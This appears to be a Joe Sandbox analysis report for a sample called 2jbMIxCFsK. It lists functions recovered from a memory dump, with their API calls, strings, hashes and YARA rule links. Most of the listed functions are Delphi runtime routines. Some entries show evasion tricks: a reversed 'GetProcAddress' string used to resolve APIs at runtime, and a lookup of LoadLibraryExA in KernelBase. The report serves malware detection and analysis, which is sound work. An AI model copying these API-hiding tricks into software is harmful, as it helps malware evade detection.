Opcode ID: d4400675b37800bae6f97b663feac51f5f6a0a7098a31e52e30e5399d422cbaa
Instruction ID: a2be9d4ca2c60cb992bf0dbaa0ce8f6e36c3cbb6dd1b3f8d165df0b3147180b8
Opcode Fuzzy Hash: d4400675b37800bae6f97b663feac51f5f6a0a7098a31e52e30e5399d422cbaa
Instruction Fuzzy Hash: 2BD05EA278E2602AA210919A2D8CDBB5ADCCAC57E1F00907AB988C6201D2148C07DAB1

Function 02E6920C Relevance: 1.5, APIs: 1, Instructions: 6timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 02E69210

Memory Dump Source

Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true

Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd

Similarity

API ID: LocalTime
String ID:
API String ID: 481472006-0
Opcode ID: 2011951a752d329e78ca378c5827ecb81dc4292a3beff4a2dc5c32cf1b86488c
Instruction ID: a17916198b9cc6d31d865cda458fc14685cedcbbe6570a15903819c7ec3bb915
Opcode Fuzzy Hash: 2011951a752d329e78ca378c5827ecb81dc4292a3beff4a2dc5c32cf1b86488c
Instruction Fuzzy Hash: 68A01180888820828A8033282C02A383088A820A20FC8CB80B8F8802E0EA2E022080A3

Function 02E620C4 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true

Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290

Function 02E6D294 Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 02E6D29D

Part of subcall function 02E6D268: GetProcAddress.KERNEL32(00000000), ref: 02E6D281

Strings

VarNot, xrefs: 02E6D2D7
VarAnd, xrefs: 02E6D371
VarCyFromStr, xrefs: 02E6D421
VarR4FromStr, xrefs: 02E6D3DF
VarDiv, xrefs: 02E6D32F
VarBstrFromDate, xrefs: 02E6D463
VarIdiv, xrefs: 02E6D345
VarMod, xrefs: 02E6D35B
VarAdd, xrefs: 02E6D2ED
VarXor, xrefs: 02E6D39D
VarI4FromStr, xrefs: 02E6D3C9
VarCmp, xrefs: 02E6D3B3
VarOr, xrefs: 02E6D387
VarBoolFromStr, xrefs: 02E6D437
VarBstrFromCy, xrefs: 02E6D44D
VariantChangeTypeEx, xrefs: 02E6D2AB
VarNeg, xrefs: 02E6D2C1
VarBstrFromBool, xrefs: 02E6D479
VarSub, xrefs: 02E6D303
VarR8FromStr, xrefs: 02E6D3F5
oleaut32.dll, xrefs: 02E6D298
VarMul, xrefs: 02E6D319
VarDateFromStr, xrefs: 02E6D40B

Memory Dump Source

Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true

Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
API String ID: 1646373207-1918263038
Opcode ID: 9f50fc1ca287ccc596434db33c6f239c5dfba022e893b443ab8ac72beec3e051
Instruction ID: d0dbdf07df951316fac64caa0d5abbe58742d8d110c908ce911ca388a10935fa
Opcode Fuzzy Hash: 9f50fc1ca287ccc596434db33c6f239c5dfba022e893b443ab8ac72beec3e051
Instruction Fuzzy Hash: 16416FA1BC82489B56046AAF7C0E437B79ED749B943E0F517F44CCF784D920EC92CA29

Function 02E76ED8 Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 32libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ole32.dll), ref: 02E76EDE
GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02E76EEF
GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02E76EFF
GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02E76F0F
GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02E76F1F
GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02E76F2F
GetProcAddress.KERNEL32(00000000,CoSuspendClassObjects), ref: 02E76F3F

Strings

CoInitializeEx, xrefs: 02E76EF9
CoSuspendClassObjects, xrefs: 02E76F39
CoResumeClassObjects, xrefs: 02E76F29
CoReleaseServerProcess, xrefs: 02E76F19
CoCreateInstanceEx, xrefs: 02E76EE9
CoAddRefServerProcess, xrefs: 02E76F09
ole32.dll, xrefs: 02E76ED9

Memory Dump Source

Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true

Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
API String ID: 667068680-2233174745
Opcode ID: 8ea4ee9cb9487dd64ffd31abe0a17888a600407b07d83a8b45323a2feb384477
Instruction ID: 823828e99c907b81268feeaef6a2025f8e5b2ec8361214885e55b6be38b999aa
Opcode Fuzzy Hash: 8ea4ee9cb9487dd64ffd31abe0a17888a600407b07d83a8b45323a2feb384477
Instruction Fuzzy Hash: 5BF08CE0AD87417DFE04BF336C8583A2B5DA620A8C344FD55B85769502E6B898508F11

Function 02E62530 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 254windowCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 02E628CE

Strings

The sizes of unexpected leaked medium and large blocks are: , xrefs: 02E62849
String, xrefs: 02E627A1
7, xrefs: 02E626A1
, xrefs: 02E62814
Unknown, xrefs: 02E6278C
An unexpected memory leak has occurred. , xrefs: 02E62690
bytes: , xrefs: 02E6275D
The unexpected small block leaks are:, xrefs: 02E62707
Unexpected Memory Leak, xrefs: 02E628C0

Memory Dump Source

Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true

Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd

Similarity

API ID: Message
String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
API String ID: 2030045667-32948583
Opcode ID: aa8c4bf6f11b3bef026a215672c0d305fb1fe39e6bd3b04c714f2491eb81537a
Instruction ID: fc1033b5e9e739a8690afe9e6cb37c33e7b20a638d44cdf11b8056f926cc7659
Opcode Fuzzy Hash: aa8c4bf6f11b3bef026a215672c0d305fb1fe39e6bd3b04c714f2491eb81537a
Instruction Fuzzy Hash: B7A1E530EC42548BDF219A2CCC88BF876E5EB09394F14E0E5EE49AB285CB759985CF51

Function 02E6252E Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 188COMMON

Download Yara Rule

Strings

The sizes of unexpected leaked medium and large blocks are: , xrefs: 02E62849
7, xrefs: 02E626A1
, xrefs: 02E62814
An unexpected memory leak has occurred. , xrefs: 02E62690
bytes: , xrefs: 02E6275D
The unexpected small block leaks are:, xrefs: 02E62707
Unexpected Memory Leak, xrefs: 02E628C0

Memory Dump Source

Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true

Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd

Similarity

API ID:
String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
API String ID: 0-2723507874
Opcode ID: df66c6891e8e2b4b61aa485f3ab6339244fbc7ca6df07e78b8bcf7adf9ab8f9b
Instruction ID: f9a00a3b99ea45c93690537952913c28d326041cfe44ed42514b4a4505b99fc7
Opcode Fuzzy Hash: df66c6891e8e2b4b61aa485f3ab6339244fbc7ca6df07e78b8bcf7adf9ab8f9b
Instruction Fuzzy Hash: 2671C830BC42588FDF219A2CCC88BE8B6E5EB09794F10A1E5EA499B281DF7549C5CF51

Function 02E6BDC0 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(00000000,02E6C08B,?,?,00000000,00000000), ref: 02E6BDF6

Part of subcall function 02E6A7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02E6A7E2

Strings

mmmm d, yyyy, xrefs: 02E6BEF2
AMPM, xrefs: 02E6C00A
m/d/yy, xrefs: 02E6BEC5
:mm:ss, xrefs: 02E6C046
AMPM , xrefs: 02E6C019
:mm, xrefs: 02E6C029

Memory Dump Source

Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true

Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd

Similarity

API ID: Locale$InfoThread
String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
API String ID: 4232894706-2493093252
Opcode ID: bbcd3837a9d8eed8081e237900656dec10d758880a8652746330c1f48aefe20b
Instruction ID: 08127e2cfdaadd2345fe98c09734111bf72b1f8522551f6873b12bc99d0e0c76
Opcode Fuzzy Hash: bbcd3837a9d8eed8081e237900656dec10d758880a8652746330c1f48aefe20b
Instruction Fuzzy Hash: E1614C30BC01889BDB10EBA4D85C6BF77BB9B98384F60F436B101AB385DA39D905DB54

Function 02E7AFE0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 102COMMON

Download Yara Rule

APIs

IsBadReadPtr.KERNEL32(?,00000004), ref: 02E7B000
GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 02E7B017
IsBadReadPtr.KERNEL32(?,00000004), ref: 02E7B0AB
IsBadReadPtr.KERNEL32(?,00000002), ref: 02E7B0B7
IsBadReadPtr.KERNEL32(?,00000014), ref: 02E7B0CB

Strings

LoadLibraryExA, xrefs: 02E7B00D
KernelBase, xrefs: 02E7B012

Memory Dump Source

Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true

Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd

Similarity

API ID: Read$HandleModule
String ID: KernelBase$LoadLibraryExA
API String ID: 2226866862-113032527
Opcode ID: f474eef75048e1cd0d4589b799d93a87b02f9556f65eca3999c46ed6df8bacf2
Instruction ID: 9be7797071c90241f272cd8c262fd5bf2ffa8bafe82a35f3d9fe4c7975d5179c
Opcode Fuzzy Hash: f474eef75048e1cd0d4589b799d93a87b02f9556f65eca3999c46ed6df8bacf2
Instruction Fuzzy Hash: E3314171680605FBDB20DB69CC89F6977A8AF1535CF009514FA14AB2C1D374A9408B60

Function 02E6435C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02E64423,?,?,02EE67C8,?,?,02E8E7A8,02E665B1,02E8D30D), ref: 02E64395
WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02E64423,?,?,02EE67C8,?,?,02E8E7A8,02E665B1,02E8D30D), ref: 02E6439B
GetStdHandle.KERNEL32(000000F5,02E643E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02E64423,?,?,02EE67C8), ref: 02E643B0
WriteFile.KERNEL32(00000000,000000F5,02E643E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02E64423,?,?), ref: 02E643B6
MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 02E643D4

Strings

Error, xrefs: 02E643C8
Runtime error at 00000000, xrefs: 02E6438E, 02E643CD

Memory Dump Source

Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true

Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd

Similarity

API ID: FileHandleWrite$Message
String ID: Error$Runtime error at 00000000
API String ID: 1570097196-2970929446
Opcode ID: 5c9e36f261835e6a514927162e21c50b07297b086790d6bf9e7b8687383a57fd
Instruction ID: 82f8a72c29551278289018f1898e4c5446babf86940cc58aa7d2583d09155b7f
Opcode Fuzzy Hash: 5c9e36f261835e6a514927162e21c50b07297b086790d6bf9e7b8687383a57fd
Instruction Fuzzy Hash: 39F09060EC4344B9FA21B2A07C4EF79275C5749BA5F58EA05B36D9C1C0C7A440C48B26

Function 02E6AEC4 Relevance: 10.6, APIs: 7, Instructions: 56filewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 02E6AD3C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02E6AD59
Part of subcall function 02E6AD3C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02E6AD7D
Part of subcall function 02E6AD3C: GetModuleFileNameA.KERNEL32(02E60000,?,00000105), ref: 02E6AD98
Part of subcall function 02E6AD3C: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02E6AE2E

CharToOemA.USER32(?,?), ref: 02E6AEFB
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 02E6AF18
WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02E6AF1E
GetStdHandle.KERNEL32(000000F4,02E6AF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02E6AF33
WriteFile.KERNEL32(00000000,000000F4,02E6AF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02E6AF39
LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 02E6AF5B
MessageBoxA.USER32(00000000,?,?,00002010), ref: 02E6AF71

Memory Dump Source

Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true

Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd

Similarity

API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
String ID:
API String ID: 185507032-0
Opcode ID: 57bde45d7cc925b0413ac00e69c5bb62bb3628f7e535f46569e991f59450730c
Instruction ID: 75166800c907a162b210bd808fd40fae00e81d9f3f805f16727b6fef33fa912b
Opcode Fuzzy Hash: 57bde45d7cc925b0413ac00e69c5bb62bb3628f7e535f46569e991f59450730c
Instruction Fuzzy Hash: 7C1173B29D4200BFD600FB54CC89FAF77ED9B45780F809925B744EA1E0DA75E9448B63

Function 02E6E58C Relevance: 9.1, APIs: 6, Instructions: 139COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02E6E625
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02E6E641
SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 02E6E67A
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02E6E6F7
SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 02E6E710
VariantCopy.OLEAUT32(?,00000000), ref: 02E6E745

Memory Dump Source

Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true

Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd

Similarity

API ID: ArraySafe$BoundIndex$CopyCreateVariant
String ID:
API String ID: 351091851-0
Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
Instruction ID: f4dc06a378c96d028b03e2120307d97b3eedb92230438a0757d88ce025398dc6
Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
Instruction Fuzzy Hash: A8511D799802299BCB62DB58CC84FE9B3BDAF48344F4491D5F508E7241E630AF808F60

Function 02E63598 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02E635BA
RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,02E63609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02E635ED
RegCloseKey.ADVAPI32(?,02E63610,00000000,?,00000004,00000000,02E63609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02E63603

Strings

SOFTWARE\Borland\Delphi\RTL, xrefs: 02E635B0
FPUMaskValue, xrefs: 02E635E4

Memory Dump Source

Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true

Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
API String ID: 3677997916-4173385793
Opcode ID: 393ef1a1b54348a3c6172fcf68659550f2fa13eff9bc939c84bfc5d31eff7e6f
Instruction ID: 530600993e5631903b31e9d6044c4bb7379229271e5a78c023a647ede92f3210
Opcode Fuzzy Hash: 393ef1a1b54348a3c6172fcf68659550f2fa13eff9bc939c84bfc5d31eff7e6f
Instruction Fuzzy Hash: 2001B5759C0218BAFB12DB919D06BBD77ECD708B40F5089A1FA08DA680E674A910DA59

Function 02E78274 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02E782FC,?,?,00000000,00000000,?,02E78215,00000000,KernelBASE,00000000,00000000,02E7823C), ref: 02E782C1
GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02E782C7
GetProcAddress.KERNEL32(?,?), ref: 02E782D9

Strings

sserddAcorPteG, xrefs: 02E7828F
Kernel32, xrefs: 02E782BC

Memory Dump Source

Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true

Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: Kernel32$sserddAcorPteG
API String ID: 667068680-1372893251
Opcode ID: b7dd2aad78f2876d4a2970252937b18df85fce9bf21efcdeb01ea6e4c586845e
Instruction ID: 7a45b6783e075d59d10dab92b45a84863ab79e062381e45f0a6e6a393eb312c9
Opcode Fuzzy Hash: b7dd2aad78f2876d4a2970252937b18df85fce9bf21efcdeb01ea6e4c586845e
Instruction Fuzzy Hash: 60014F746C4304BFEB14EBA4EC49A6EB7AEEB49B50F91D460B800DB640E674A940DA24

Function 02E6AA50 Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(?,00000000,02E6AAE7,?,?,00000000), ref: 02E6AA68

Part of subcall function 02E6A7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02E6A7E2

GetThreadLocale.KERNEL32(00000000,00000004,00000000,02E6AAE7,?,?,00000000), ref: 02E6AA98
EnumCalendarInfoA.KERNEL32(Function_0000A99C,00000000,00000000,00000004), ref: 02E6AAA3
GetThreadLocale.KERNEL32(00000000,00000003,00000000,02E6AAE7,?,?,00000000), ref: 02E6AAC1
EnumCalendarInfoA.KERNEL32(Function_0000A9D8,00000000,00000000,00000003), ref: 02E6AACC

Memory Dump Source

Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true

Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd

Similarity

API ID: Locale$InfoThread$CalendarEnum
String ID:
API String ID: 4102113445-0
Opcode ID: 7350c1a148f693cfccac241d111f43daf5b10796b31d5be80c34f7067734da48
Instruction ID: be892b1dfbddbbd74e1e818b0777b9eda55297fc81f581978ea075117768ced9
Opcode Fuzzy Hash: 7350c1a148f693cfccac241d111f43daf5b10796b31d5be80c34f7067734da48
Instruction Fuzzy Hash: C6014770AD02046FFA11BB64DD1AB3E335DDB41790F50E171F002B67C0D57A9E008A24

Function 02E6AB00 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(?,00000000,02E6ACD0,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 02E6AB2F

Part of subcall function 02E6A7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02E6A7E2

Strings

yyyy, xrefs: 02E6AC25
eeee, xrefs: 02E6AC3E
ggg, xrefs: 02E6AC15

Memory Dump Source

Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true

Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
